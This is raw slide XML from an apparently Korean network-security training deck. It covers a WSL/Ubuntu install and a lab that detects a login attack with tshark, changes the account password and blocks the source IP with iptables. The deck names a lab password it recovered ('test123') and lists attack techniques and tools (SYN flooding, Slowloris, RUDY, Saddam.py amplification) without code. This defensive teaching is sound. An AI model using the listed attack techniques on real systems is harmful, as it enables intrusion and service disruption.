            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276340" y="841586"/>
            <a:ext cx="4932299" cy="1906524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 211">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9784306D-6D5E-4942-8586-70E08559BD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276340" y="3194366"/>
            <a:ext cx="4563491" cy="1431290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752B0B64-EE1D-4AE6-9057-DB2AD754F4B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5212080"/>
            <a:ext cx="5616792" cy="127691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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>알아낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정의 비밀번호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test123</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F75CF8C-D2CF-4B10-99AF-406051986A7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5CB86-A337-4D4F-A0BE-94E20C0C6D0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5D0595E3-4650-484A-B208-5B38FDFDCD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1BF2A5CE-73E8-43EF-83B5-8109A46E3F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47054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Username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 입력하라는 메시지가 출력된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>새로 설치할 우분투의 사용자명과 비밀번호를 여기서 설정하면 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기존 윈도우의 계정이름</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>비밀번호와 똑같이 할 필요는 없다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기억하기 어려우면 똑같이 해도 됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</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9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정이 완료되면 이 창을 닫고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 관리자 권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 을 실행시킨다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 쳤을 때 다음과 같은 화면이 나오면 정상적으로 설치가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>완료된것</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10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“exit” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력하여 터미널로 나가준다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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음 명령어를 입력하여  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버전을 확인한다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–l -v</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12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음 페이지에서 커널 업데이트 패키지를 다운받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>각 운영체제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 맞는 패키지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans KR"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Docs.Microsoft.com/ko-KR/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans KR"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans KR"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/wsl2-kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans KR"/>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13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운받은 커널 패키지를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3" name="그림 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA3B15B1-8494-46AD-96E2-32AE76C7A922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="543338" y="1065443"/>
            <a:ext cx="5314359" cy="1210523"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418B2E22-9D53-4183-8534-25F7FC65F038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="543338" y="3100898"/>
            <a:ext cx="5314359" cy="1483632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA813AC3-D9C1-4105-9CBE-513605A26F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561797" y="5180862"/>
            <a:ext cx="5295900" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="그림 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51AB68B4-7795-47CF-9DBF-2C3F4524BED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561797" y="5565073"/>
            <a:ext cx="5314359" cy="462325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{783AF243-536B-44BA-A673-E5717ECB0A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329057" y="872083"/>
            <a:ext cx="5266209" cy="1076857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF195253-183B-407A-AE9D-FA6E43A6BA7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329057" y="2611207"/>
            <a:ext cx="5325056" cy="1827923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="그림 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A0D0F15-D871-489C-AF19-A37DE5DF06E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6552360" y="4928821"/>
            <a:ext cx="1763145" cy="1370542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="직사각형 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C6024A-3F30-4CFF-AFDA-EA91E4F4564D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629864" y="1501852"/>
            <a:ext cx="799637"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9DA46569-825A-4F86-BCF9-1C3DB30F3D40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614051" y="5210736"/>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A69D648F-38CA-4347-B311-18F1F9E3CAD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329057" y="1070984"/>
            <a:ext cx="1353238" cy="137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89DC93-CD73-488C-88B9-F96536A60B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6679499" y="3100898"/>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1698C9F9-873B-4072-9688-4B1A005A93B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7623934" y="6140902"/>
            <a:ext cx="39379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오른쪽 17">
            <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6786EA8-EF5F-40E5-951C-642230DFF24C}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BCEDB28-C3F5-4567-BBD0-A9F45BD56384}"/>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3E78C89-AEE8-4FAB-99BC-E7056B1E2C8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F75F85A5-EAF2-42E6-9DF9-ADB015522D4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11" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCCB06DB-AD42-41B9-A784-6DAF4122287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87185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81B9CBF-A5B3-468D-8635-097A577D36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서버에 원격 접속하는 사용자를 모니터링 하고자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라는 패킷 분석 툴을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원격접속을 시도 중인 프로토콜과 사용자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정보를 탐지하고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의심되는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카운터 및 저장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200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확인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명령</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INPUT -s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-j DROP</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계정 비인가 접속을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E592B200-FBE7-4D7D-A165-2493496E950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CFE82343-4BBD-4E0D-B511-6DAFED7550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7EFBE23-EE89-4F6E-BCBE-44800C08F93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CD8D1CB7-9FAF-4E3C-84DF-4F59D5C534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866487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보안 로그 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 원격접속 패킷 저장 후 확인</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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.1.169</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 로그인 시도를 하고 있음 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>해당 계정의 비밀번호 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>passwd test01</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무작위 공격 시도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>차단</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–A INPUT –s IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–j DROP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 213">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D6AC6CE-5568-40D0-9A0E-7CBAEA27D1CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1" r="200" b="50518"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529203" y="1077475"/>
            <a:ext cx="4941294" cy="1371527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 215">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3226F2-D95F-4C7A-A031-E5395AF94290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="499029" y="3213138"/>
            <a:ext cx="5001641" cy="804545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 217">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A4D9A2-400E-4443-9DFF-059E3D0274AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529203" y="4521715"/>
            <a:ext cx="4954016" cy="1767840"/>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41FCE32E-C979-4B56-9233-FE6E734747D9}"/>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14795DC3-5BD6-4250-9E45-F541B4F1992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8B44DC69-D4B3-4C1D-94C7-0B323B8B21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2C7967E-F168-40C2-95C6-A9174FDB60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B99FDD40-A174-4C54-A5B9-EA0B7E1542E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24314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324792155"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1798320" y="1550471"/>
          <a:ext cx="8563556" cy="5171313"/>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텔넷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Finger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mailx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스팸 메일 릴레이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OpenSSL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4"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통제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스캔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5"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ARP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6"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IP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7"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SYN Flooding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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>iftop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8"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Ping </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>of Death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Saddam.py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9"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Amplification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10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a: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Slowloris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RUDY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snort</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
